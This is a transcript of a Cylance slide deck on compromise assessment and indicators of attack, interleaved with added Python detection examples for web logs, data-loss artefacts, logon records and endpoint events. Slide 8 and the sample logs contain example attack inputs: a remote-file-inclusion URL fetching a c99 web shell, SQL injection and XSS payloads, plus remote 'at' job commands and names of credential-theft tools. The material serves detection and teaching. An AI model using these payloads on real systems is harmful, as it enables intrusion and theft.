Transcript of: Corey White, VP, Professional Services, Cylance – Mathematical Determination of Good and Bad Leveraging Preventative / Response Professional Services (26 slides)

Page 1: Mathematical Determination of Good and Bad Leveraging Preventative / Response Professional Services

Corey White, VP, Professional Services, Cylance

Page 2:

Page 3: PRESPONSE Professional Services

Page 4: Risk Does Not Equal Threat | Presponse Compromise Assessment

Page 5:

Page 6: Malware - Windows / Linux / OSX (31% didn’t use malware)

• Dropper/Downloaders – Phishing & Waterholing; malware in userspace; zero/single-day exploits that lead to…
• Backdoor Trojan RATs – kernel-interactive service binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)
• BOTNETs – platforms for MaaS/subscription access
• WebShells – Internet-facing server backdoor RATs (c99/r57/eval)

Page 7: Hacking - .day Exploits

• Zero Day – vulnerability that only the developer knows about
• ½ Day – vulnerability that is known about but no patches are yet available
• Single Day – vulnerability that is known about and patches are available but not applied
• Forever Day – vulnerability that is known and cannot be patched

Page 8: Hacking - Web Server/Services Exploits

• Remote code execution (watch your .htaccess files!) – register_globals on in PHP | require ($page . ".php");
    http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt

• SQL injection (watch your user privileges!) – AND / OR in SQL $query | $query = "SELECT * FROM users WHERE username = '' or '1=1'";
    http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version)

• Cross Site Scripting/XSS (watch your syntax!) – volatile entry in echo | <?php echo "<p>Your Name <br />"; echo ($_GET[name_1]); ?>
    http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>

• Username enumeration (watch your error messages!) – username guessing | "Incorrect logon / password combination"
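The four request shapes on this slide are easy to recognise in a web server's own access log, which is usually the first evidence a compromise assessment gets to look at. The following is an added example (not from the deck or from Cylance): it parses combined-format log lines, flags parameter values that carry a remote URL (the register_globals/require pattern), SQL boolean logic or @@version probing, and script tags, and counts failed logons per client to catch username guessing. The log lines, hosts and client addresses are constructed for the example; the rule names are this example's own.

```python
"""Added example (not from the deck): scan web-server access-log lines for the
request shapes slide 8 describes and for brute-force username guessing."""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample traffic in Apache/nginx "combined"-style format; the
# hosts, clients and timestamps are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2014:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [12/Jun/2014:10:01:09 +0000] "GET /index.php?page=http://www.ilikeyoursite.com/c99.txt HTTP/1.1" 200 8192
10.0.0.9 - - [12/Jun/2014:10:01:15 +0000] "GET /site.asp?id=1%20and%201=convert(int,@@version) HTTP/1.1" 500 1203
10.0.0.7 - - [12/Jun/2014:10:02:00 +0000] "GET /clean.php?name_1=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300
10.0.0.7 - - [12/Jun/2014:10:02:01 +0000] "GET /clean.php?name_1=Alice HTTP/1.1" 200 300
10.0.0.9 - - [12/Jun/2014:10:03:00 +0000] "POST /login.php HTTP/1.1" 401 150
10.0.0.9 - - [12/Jun/2014:10:03:01 +0000] "POST /login.php HTTP/1.1" 401 150
10.0.0.9 - - [12/Jun/2014:10:03:02 +0000] "POST /login.php HTTP/1.1" 401 150
10.0.0.7 - - [12/Jun/2014:10:04:00 +0000] "POST /login.php HTTP/1.1" 401 150
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)$')

# A parameter value that points at a remote resource or a PHP stream wrapper:
# the register_globals + require($page . ".php") inclusion shape.
RFI_RE = re.compile(r'^(https?|ftp)://|^(php|data|expect)://', re.I)
# Boolean logic or version probing appended to a numeric parameter.
SQLI_RE = re.compile(r"(\b(and|or)\b\s*['\d]+\s*=)|@@version|convert\s*\(\s*int", re.I)
# Script tags or event handlers that an unescaped echo would reflect back.
XSS_RE = re.compile(r'<\s*script|javascript:|\bon[a-z]+\s*=', re.I)


def parse_line(line):
    """Split one combined-format line into fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # parse_qsl decodes once; the extra unquote catches double-encoded payloads.
    rec['params'] = [(k, unquote(v))
                     for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return rec


def classify(rec):
    """Return the sorted list of rule names the request's parameters trip."""
    hits = set()
    for _, value in rec['params']:
        if RFI_RE.search(value):
            hits.add('remote-file-inclusion')
        if SQLI_RE.search(value):
            hits.add('sql-injection')
        if XSS_RE.search(value):
            hits.add('xss')
    return sorted(hits)


def scan_log(text):
    """(client, rule, path) for every request that trips a rule."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in classify(rec):
            findings.append((rec['ip'], rule, rec['path']))
    return findings


def failed_login_clients(text, login_path='/login.php', threshold=3):
    """Clients with at least `threshold` failed logons: the guessing side of
    username enumeration, which a uniform error message alone does not stop."""
    counts = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if (rec and rec['path'] == login_path and rec['method'] == 'POST'
                and rec['status'] in ('401', '403')):
            counts[rec['ip']] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == '__main__':
    for ip, rule, path in scan_log(SAMPLE_LOG):
        print(f'{ip:12} {rule:24} {path}')
    print('repeated failed logons:', failed_login_clients(SAMPLE_LOG))
```

The patterns are deliberately narrow (they match the three URLs the slide shows and little else); in practice they would sit behind a parser that has already normalised encoding, and the failed-logon threshold would be tuned to the site's normal error rate.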

Page 9: Social Engineering – Access, Behavior, and Authority

Subversion
• Contractors
• Employees

Sabotage
• Phishing
• Waterholing
• USB “HoneyDrops” & other free hardware
• “HelpDesk Operators”
• “Visitors” (Repairmen, Janitors, Pizza/Flower Delivery, Tailgaters)

Page 10: Advanced Persistent Threat - Activities

Stage 1 - Compromise
• Social Engineering Backdoors
  – Phishing / Waterholing
  – Help Desk / Visitors
• Web Site Backdoors
• Reconnaissance

Stage 2 - Exploit
• Privilege Escalation
• Lateral Movement
• User Profile Abuse
• Remote Access Provisioning
• Services Bypass/Cancellation

Stage 3 - Control
• Configuration Management
• Data Targeting
• Data Exfiltration
• Sabotage
• Subversion

Page 11: Most commonly seen indicators of data loss:

• Non-standard Packagers (7z, Gz, RAR, PKZIP, etc.)
• Multipart Files of particular sizes (250/500Mb)
• “Recycle”/Recycle Bin Residue
• HTTP 206 Status Codes on Web Servers
• Non-standard File Transfer Services (Filezilla, FTP, WsFTP, etc.)
• Non-standard Reverse/Proxy Services (HUCs, PLINK, NC, SSH, etc.)
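Two of these indicators can be checked mechanically from artefacts an assessment already collects: a file listing (multipart archive volumes of uniform size, and whether they sit in a Recycle Bin folder) and the web server log (HTTP 206 partial-content responses adding up to a large download of one file). The following is an added example, not the deck's or Cylance's code; the file listing, sizes and log lines are constructed, the paths use forward slashes so the example runs on any platform, and the 250/500 MiB volume sizes are taken from the slide's bullet.

```python
"""Added example (not from the deck): multipart archive sets and HTTP 206
transfers, two of the data-loss indicators on slide 11, over constructed input."""
import re
from collections import defaultdict
from posixpath import basename, dirname

MIB = 1024 * 1024
# Volume sizes the slide calls out; a set split at one of these is treated as suspect.
SUSPECT_VOLUME_MIB = (250, 500)

# Constructed (path, size_in_bytes) listing with forward slashes.
FILES = [
    ("C:/Users/bob/Documents/report.docx", 1_200_000),
    ("C:/Users/bob/Pictures/holiday.zip", 5_000_000),
    ("C:/RECYCLER/S-1-5-21-1/Dc12.7z.001", 250 * MIB),
    ("C:/RECYCLER/S-1-5-21-1/Dc12.7z.002", 250 * MIB),
    ("C:/RECYCLER/S-1-5-21-1/Dc12.7z.003", 88 * MIB),
    ("C:/Windows/Temp/backup.part1.rar", 500 * MIB),
    ("C:/Windows/Temp/backup.part2.rar", 500 * MIB),
    ("C:/Windows/Temp/backup.part3.rar", 10 * MIB),
]

# Constructed combined-format access-log lines.
SAMPLE_LOG = """\
203.0.113.8 - - [12/Jun/2014:02:10:00 +0000] "GET /uploads/Dc12.7z.001 HTTP/1.1" 206 52428800
203.0.113.8 - - [12/Jun/2014:02:11:00 +0000] "GET /uploads/Dc12.7z.001 HTTP/1.1" 206 52428800
203.0.113.8 - - [12/Jun/2014:02:12:00 +0000] "GET /uploads/Dc12.7z.001 HTTP/1.1" 206 52428800
198.51.100.4 - - [12/Jun/2014:09:00:00 +0000] "GET /docs/guide.pdf HTTP/1.1" 206 2000
198.51.100.4 - - [12/Jun/2014:09:00:05 +0000] "GET /index.html HTTP/1.1" 200 4096
"""

# Volume naming schemes of the common packagers: name.7z.001, name.part1.rar,
# old-style name.r00, and name.z01 for split zip files.
VOLUME_PATTERNS = [
    ("7z", re.compile(r"^(?P<stem>.+)\.7z\.(?P<idx>\d{3})$", re.I)),
    ("rar", re.compile(r"^(?P<stem>.+)\.part(?P<idx>\d+)\.rar$", re.I)),
    ("rar-old", re.compile(r"^(?P<stem>.+)\.r(?P<idx>\d{2})$", re.I)),
    ("zip", re.compile(r"^(?P<stem>.+)\.z(?P<idx>\d{2})$", re.I)),
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) \S+" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)$')


def in_recycle_bin(path):
    """True for paths under the Recycle Bin folders of NT/XP and Vista+ layouts."""
    lowered = path.lower()
    return ("$recycle.bin" in lowered or "/recycler/" in lowered
            or "/recycled/" in lowered)


def multipart_archive_sets(files):
    """Group volumes by folder, stem and scheme; report each set of two or more
    parts with its uniform volume size (all parts except the last) and flags."""
    groups = defaultdict(list)
    for path, size in files:
        for kind, pat in VOLUME_PATTERNS:
            m = pat.match(basename(path))
            if m:
                groups[(dirname(path), m.group("stem"), kind)].append(
                    (int(m.group("idx")), size, path))
                break
    findings = []
    for (folder, stem, kind), parts in groups.items():
        if len(parts) < 2:
            continue
        parts.sort()
        body = [size for _, size, _ in parts[:-1]]  # the last volume is the short one
        volume = body[0] if len(set(body)) == 1 else None
        findings.append({
            "set": f"{folder}/{stem}", "kind": kind, "parts": len(parts),
            "volume_mib": volume // MIB if volume else None,
            "total_mib": sum(size for _, size, _ in parts) // MIB,
            "suspect_size": volume is not None and volume // MIB in SUSPECT_VOLUME_MIB,
            "recycle_bin": any(in_recycle_bin(p) for _, _, p in parts),
        })
    return findings


def partial_content_transfers(log_text, min_bytes=100 * MIB):
    """Bytes served with HTTP 206 per (client, path), keeping the large ones:
    range requests are how a staged file is pulled off a web server in chunks."""
    totals = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group("status") == "206" and m.group("size") != "-":
            totals[(m.group("ip"), m.group("target"))] += int(m.group("size"))
    return {key: total for key, total in totals.items() if total >= min_bytes}


if __name__ == "__main__":
    for finding in multipart_archive_sets(FILES):
        print(finding)
    print(partial_content_transfers(SAMPLE_LOG))
```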

Page 12: Most commonly seen indicators of sabotage:

• Unusual Prefetch / Recent / LNK / Bash binary execution history
• AT / CRON Jobs
• Scripts
• Services Cancellation
• User Profile Authority Changes

Page 13: Most commonly seen indicators of user profile abuse:

• Multiple user accounts on single computer
• User account on multiple computers
• Service & Administrative account propagation
• Extranet LDAP/AD account use
• Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)
• Local Services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)

Page 14: Most commonly seen indicators of lateral movement:

• Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)
• MSTSC history (.RDP, .BMC)
• Remote job scheduling (AT, SC, WMIC, SSH)
• Redundant & non-standard RAS tools (VNC, LogMeIn, TeamViewer, NC, PUTTY, PSEXEC, *FTP, SCP)
• Domain Services history (DSGET, DSQUERY, HYENA)
• Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)
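The profile-abuse indicators on page 13 (one account on many computers, many accounts on one computer, service/administrative account propagation) and the lateral-movement indicators above (logon types, remote job scheduling) all fall out of the same two record types: successful logon events with their logon type, and process-creation records with their command line. The following is an added example, not the deck's or Cylance's code, that runs those checks over constructed records. The event field names, hostnames, account names, the service-account naming convention (svc_/adm_/admin_ prefixes) and the thresholds are assumptions of this example; the logon-type names are the standard Windows ones.

```python
"""Added example (not from the deck): profile-abuse and lateral-movement checks
over constructed Windows logon (4624-style) and process-creation (4688-style)
records."""
import re
from collections import defaultdict

# Standard Windows logon types; 3/4/8/10 are the ones the slide names.
LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service",
               7: "Unlock", 8: "NetworkCleartext", 9: "NewCredentials",
               10: "RemoteInteractive", 11: "CachedInteractive"}
# Logon types that put a person (or someone replaying their credentials) at a
# console or RDP session; plain type-3 share access is normal noise and skipped.
INTERACTIVE = {2, 10, 11}
# Assumed naming convention for service and administrative accounts.
SERVICE_ACCOUNT_RE = re.compile(r"^(svc_|sa_|adm_|admin_)", re.I)
# Remote-targeted invocations of the scheduling/execution tools the slide lists.
REMOTE_EXEC_RE = re.compile(
    r"^(?:at|sc|schtasks|wmic|psexec)(?:\.exe)?\s.*?"
    r"(?:\\\\(?P<unc>[\w.-]+)|/node:(?P<node>[\w.-]+)|/s\s+(?P<s>[\w.-]+))", re.I)

# Constructed successful-logon records (reduced 4624 fields).
LOGONS = [
    dict(ts="2014-06-12T08:01", host="HR-PC-07", user="alice", logon_type=2, src="-"),
    dict(ts="2014-06-12T08:05", host="FS01", user="alice", logon_type=3, src="10.1.1.7"),
    dict(ts="2014-06-12T22:10", host="HR-PC-07", user="svc_backup", logon_type=10, src="10.1.1.50"),
    dict(ts="2014-06-12T22:12", host="FIN-PC-02", user="svc_backup", logon_type=3, src="10.1.1.7"),
    dict(ts="2014-06-12T22:13", host="FIN-PC-02", user="svc_backup", logon_type=10, src="10.1.1.7"),
    dict(ts="2014-06-12T22:20", host="DC01", user="svc_backup", logon_type=10, src="10.1.1.7"),
    dict(ts="2014-06-12T22:25", host="HR-PC-07", user="bob", logon_type=10, src="10.1.1.50"),
    dict(ts="2014-06-12T22:26", host="HR-PC-07", user="carol", logon_type=10, src="10.1.1.50"),
    dict(ts="2014-06-12T22:27", host="HR-PC-07", user="admin_t1", logon_type=10, src="10.1.1.50"),
]
# Constructed process-creation records (reduced 4688 fields).
PROCESSES = [
    dict(ts="2014-06-12T22:14", host="HR-PC-07", user="svc_backup", cmd=r"sc \\FIN-PC-02 query"),
    dict(ts="2014-06-12T22:15", host="HR-PC-07", user="svc_backup", cmd=r"wmic /node:FIN-PC-02 os get caption"),
    dict(ts="2014-06-12T22:16", host="HR-PC-07", user="svc_backup", cmd=r"at \\DC01 23:00 update.bat"),
    dict(ts="2014-06-12T09:00", host="FS01", user="alice", cmd=r"sc query spooler"),
]


def accounts_on_many_hosts(logons, threshold=3):
    """'User account on multiple computers': accounts with interactive or RDP
    logons on at least `threshold` distinct hosts."""
    hosts = defaultdict(set)
    for e in logons:
        if e["logon_type"] in INTERACTIVE:
            hosts[e["user"]].add(e["host"])
    return {u: sorted(h) for u, h in hosts.items() if len(h) >= threshold}


def hosts_with_many_accounts(logons, threshold=3):
    """'Multiple user accounts on single computer'."""
    users = defaultdict(set)
    for e in logons:
        if e["logon_type"] in INTERACTIVE:
            users[e["host"]].add(e["user"])
    return {h: sorted(u) for h, u in users.items() if len(u) >= threshold}


def service_account_rdp(logons):
    """Service/administrative account propagation: a service account opening an
    RDP (type 10) session is a human, or a replayed credential, not the service."""
    return [(e["ts"], e["user"], e["host"], e["src"], LOGON_TYPES[e["logon_type"]])
            for e in logons
            if e["logon_type"] == 10 and SERVICE_ACCOUNT_RE.match(e["user"])]


def remote_job_scheduling(processes):
    """(ts, source host, user, target host) for remote AT/SC/WMIC/schtasks/psexec use."""
    hits = []
    for p in processes:
        m = REMOTE_EXEC_RE.match(p["cmd"])
        if m:
            target = m.group("unc") or m.group("node") or m.group("s")
            hits.append((p["ts"], p["host"], p["user"], target))
    return hits


if __name__ == "__main__":
    print(accounts_on_many_hosts(LOGONS))
    print(hosts_with_many_accounts(LOGONS))
    print(service_account_rdp(LOGONS))
    print(remote_job_scheduling(PROCESSES))
```

On real data the logon records come from the Security log of every host (or the domain controllers' 4624/4768/4769 events) and the thresholds are set against a baseline of normal help-desk and administrator activity; the point of the example is that all four indicators are simple aggregations once the logon type is kept with the record.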

Page 15: Most commonly seen indicators of insider threats:

• Unusual profile access and use history
  – Time
  – HostID
  – Application History
  – Configuration History
• RBAC violations
• Other Acceptable Use Policy violations
• Malware / PUP / PUM…

Page 16: Most common malware identifiers:

• Authority – service, administrator, or user
• Persistence – only 4 persistence mechanisms in Windows
• Communications – only 44 netsvcs keys in Windows Services
• Functionality – user and kernel combinations are rare
• File System – user or system

Page 17: Risk Does Not Equal Threat | Presponse Compromise Assessment

Issues Not Indicators

Focus on Priorities

Page 18: Get Ahead of Compromise Activities

• Monitor
  – Persistence settings: registry keys, startup folders, scheduled jobs/tasks
  – Service creations
• Alert
  – User Profile Propagation
  – Lateral Movement/Access
  – Anomalous Use (time/resources)
  – Service State Changes (start/stop)
  – File creations by type (RAR, BAT, VBS, SH, etc.)
  – Sinkhole Communications
• Prevent
  – Assess and Secure Networks & Applications
  – Automated Tasks
  – Known PUP/PUMs
  – User-space Execution
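The Monitor and Alert items on this slide map onto a handful of endpoint event types: registry writes to autostart keys, file creation in a Startup folder, scheduled-task and service creation, service stop/start, file creation by extension, and DNS lookups of sinkholed names. The following is an added example, not the deck's or Cylance's code, that evaluates those rules over a constructed event stream. The event field names, the protected-service list, the sinkhole domain and the extra .ps1 extension are assumptions of this example; the autostart keys and Startup folder are the standard Windows locations.

```python
"""Added example (not from the deck): a rule pass over constructed endpoint
telemetry for the Monitor/Alert items on slide 18."""
import ntpath
import re
from collections import namedtuple

Alert = namedtuple("Alert", "ts host rule detail")

# Standard Windows autostart registry keys and the per-user Startup folder.
PERSISTENCE_KEY_RE = re.compile(r"\\(Run|RunOnce|RunServices|Winlogon)$", re.I)
STARTUP_FOLDER_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
# File types the slide lists for creation alerts; .ps1 is an added assumption.
ALERT_EXTENSIONS = {".rar", ".bat", ".vbs", ".sh", ".ps1"}
# Services whose stop is worth an alert (firewall, Defender, updates, event log);
# an assumed short list, not the slide's.
PROTECTED_SERVICES = {"mpssvc", "windefend", "wuauserv", "eventlog"}
# Constructed sinkhole list standing in for a real sinkhole/threat feed.
SINKHOLE_DOMAINS = {"update-check.example.net"}

# Constructed events; field names are this example's own, not a product schema.
H = "HR-PC-07"
EVENTS = [
    dict(ts="2014-06-12T22:30", host=H, type="registry_set",
         key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
         value="updater", data=r"C:\Users\bob\AppData\Roaming\upd.exe"),
    dict(ts="2014-06-12T22:31", host=H, type="file_create",
         path=r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sync.vbs"),
    dict(ts="2014-06-12T22:32", host=H, type="task_create",
         name=r"\Maintenance\Cleanup", action=r"C:\Windows\Temp\c.bat"),
    dict(ts="2014-06-12T22:33", host=H, type="service_create",
         name="WinUpdSvc", image=r"C:\Windows\Temp\svc.exe"),
    dict(ts="2014-06-12T22:34", host=H, type="service_state", name="MpsSvc", state="stopped"),
    dict(ts="2014-06-12T22:35", host=H, type="service_state", name="Spooler", state="started"),
    dict(ts="2014-06-12T22:36", host=H, type="file_create", path=r"C:\Users\bob\Documents\Q2.docx"),
    dict(ts="2014-06-12T22:37", host=H, type="file_create", path=r"C:\RECYCLER\S-1-5-21-1\stage.rar"),
    dict(ts="2014-06-12T22:38", host=H, type="dns_query", qname="update-check.example.net"),
    dict(ts="2014-06-12T22:39", host=H, type="dns_query", qname="www.example.com"),
]


def evaluate(ev):
    """Return the alerts one event raises; a single event can trip several rules."""
    alerts = []

    def add(rule, detail):
        alerts.append(Alert(ev["ts"], ev["host"], rule, detail))

    kind = ev["type"]
    if kind == "registry_set" and PERSISTENCE_KEY_RE.search(ev["key"]):
        add("persistence", f'{ev["key"]}\\{ev["value"]} = {ev["data"]}')
    elif kind == "task_create":
        add("persistence", f'task {ev["name"]} -> {ev["action"]}')
    elif kind == "file_create":
        if STARTUP_FOLDER_RE.search(ev["path"]):
            add("persistence", f'startup folder: {ev["path"]}')
        # ntpath handles the backslash paths regardless of the host OS.
        if ntpath.splitext(ev["path"])[1].lower() in ALERT_EXTENSIONS:
            add("file-type", ev["path"])
    elif kind == "service_create":
        add("service", f'new service {ev["name"]} ({ev["image"]})')
    elif (kind == "service_state" and ev["state"] == "stopped"
            and ev["name"].lower() in PROTECTED_SERVICES):
        add("service", f'{ev["name"]} stopped')
    elif kind == "dns_query" and ev["qname"].lower() in SINKHOLE_DOMAINS:
        add("sinkhole", ev["qname"])
    return alerts


def run_rules(events):
    """Flat list of alerts for an event stream, in event order."""
    return [a for ev in events for a in evaluate(ev)]


if __name__ == "__main__":
    for a in run_rules(EVENTS):
        print(f"{a.ts} {a.host} {a.rule:12} {a.detail}")
```

The rules here fire on single events; the User Profile Propagation, Lateral Movement and Anomalous Use alerts on the same slide need aggregation across hosts and time rather than a per-event match, and are the kind of check shown with the logon records under page 14.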

Page 19: Victimization

• CANDY DROP
• SUPPLY CHAIN
• SOCIAL ENGINEERING
• EMAIL
• WEB
• DIRECT OPEN PORTS (TCP/135)
• INSIDER

Page 20: Innovation Requires STARVATION

Page 21: WARNING: Deprogramming Required

JUST 100% Pure MATH
• NO Signatures
• NO Heuristics
• NO Behavioral
• NO Sandboxing
• NO Dynamic Detonation
• NO Micro-Virtualization

Page 22: [Diagram] A spectrum from MALICIOUS to GOOD: Blacklist (20%) | “THE GREYLIST” / UNKNOWN – GAP (60%+) | Whitelist (20%). Technology labels placed along it: Sandboxing, Servers AV, Antivirus / HIPS, Firewall, Email / Web Gateway, IDS/IPS, Whitelisting, Behavioral Analysis, 100% Pure Math.

Page 23:

Page 24: Trust the Vendor / Trust the Math

Page 25: Product Portfolio

JUNE 2013 – Infinity
• Free, Silent
• REST API over SSL
• Advanced Threat
• Over 5,000 seats
Detection only

OCTOBER 2013
• V-API
• V-Forensics
• V-Gateway
• V-Helpdesk
Detection only

FEBRUARY 2014
• Windows Agent
• Cloud management
• Silent / small footprint
Detection and Protection

DETECT | SWEEP*

APRIL 2014
• Browser delivery
• Detection of threats
• Silent / small footprint
Detection with Protection option

Page 26: